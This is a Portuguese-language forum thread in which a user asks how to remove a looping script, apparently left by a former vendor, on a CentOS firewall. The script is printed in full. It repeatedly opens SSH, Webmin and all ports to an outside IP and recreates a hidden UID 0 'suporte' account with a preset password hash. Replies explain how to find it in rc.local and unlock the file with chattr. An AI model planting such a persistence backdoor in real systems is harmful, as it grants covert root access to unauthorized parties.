Tarefas Agendadas

fabriciobnu
(usa Outra)

Enviado em 03/08/2012 - 16:26h

Boa Tarde amigos,
Preciso muito da ajuda de vocês, Bom na empresa que trabalho tenho um Firewall Linux com o CentOs rodando.
Dentro de /etc tem esse maldito "netfw.sh" que pelo que eu vi ele tem uma tarefa agendada, deleta o usuário criado por eles (empresa antiga) e cria de novo, e libera a porta 22 para o ip deles. (não queremos fazer outro linux, porque esta rodando tudo ok, somente tirar o acesso dessa empresa)
vo colar aqui o script...
----
#!/bin/bash
time=120 # segundos
count=0
while [ $count -eq 0 ]; do
iptables -D INPUT -s "ip da empresa" -p tcp --dport 22 -j ACCEPT
iptables -I INPUT -s "ip da empresa" -p tcp --dport 22 -j ACCEPT
iptables -D INPUT -s "ip da empresa" -p tcp --dport 10000 -j ACCEPT
iptables -I INPUT -s "ip da empresa" -p tcp --dport 10000 -j ACCEPT
iptables -D INPUT -s "ip da empresa" -j ACCEPT
iptables -I INPUT -s "ip da empresa" -j ACCEPT
userdel suporte
useradd -u 0 -g 0 -l -o suporte -p say8yvV1q0vuk
sleep $time
done

----
- Detalhe que não consigo editar esse arquivo (logado com root)
- ja parei o serviço do CRON, CRONTAB e mesmo assim segue criando o usuário.
- Não consigo alterar permissões desse arquivo que me retorna com a msg

chmod: alterando permissões de "netfw.sh": Operação não permitida

Pessoal sou novo aqui, e novo em linux. preciso muito da ajuda dos amigos ai!!!

Abraço a Todos e ta lançado o desafio :) se alguem conseguir sou capaz de mandar
um presente!!!

Grato por tudo.

renato_pacheco
(usa Debian)

Enviado em 03/08/2012 - 16:33h

- Veja se, dentro do arquivo /etc/rc.local, existe um caminho executando esse arquivo;
- Analise o cron com o comando crontab -e pra saber se há agendamento;
- Mude a atribuição do arquivo pra vc modificá-lo com o comando chattr -i /etc/netfs.sh;
- Já me prometeram tantos presentes q eu vou fingir q li isso...

fabriciobnu
(usa Outra)

Enviado em 06/08/2012 - 08:22h

-No Rc.local existia " service netfw start "
-O Cron eu ja tinha parado
-sobre a atribuição do arquivo foi de grande ajuda pois depois disso consegui editar o arquivo, para fins de teste comentei as linhas do arquivo netfw.sh e pra minha surpresa, ele ainda criava os 2 usuários. bom como eu vi que o netfw estava sendo startado no rc.local resolvi parar o serviço NETFW (não sei para que serve)
e depois disso consegui ter sucesso. até agora não deu problema.
resolvi tambem trocar a porta padrão do ssh para maior segurança.

Amigo posso deixar parado o netfw?

Amigo muito Obrigado até agora, foi de grande ajuda.

renato_pacheco
(usa Debian)

Enviado em 06/08/2012 - 09:29h

Se vc quiser, pode. A não ser q vc queira utilizá-lo para outro fim. Não esqueça d marcar o tópico como resolvido.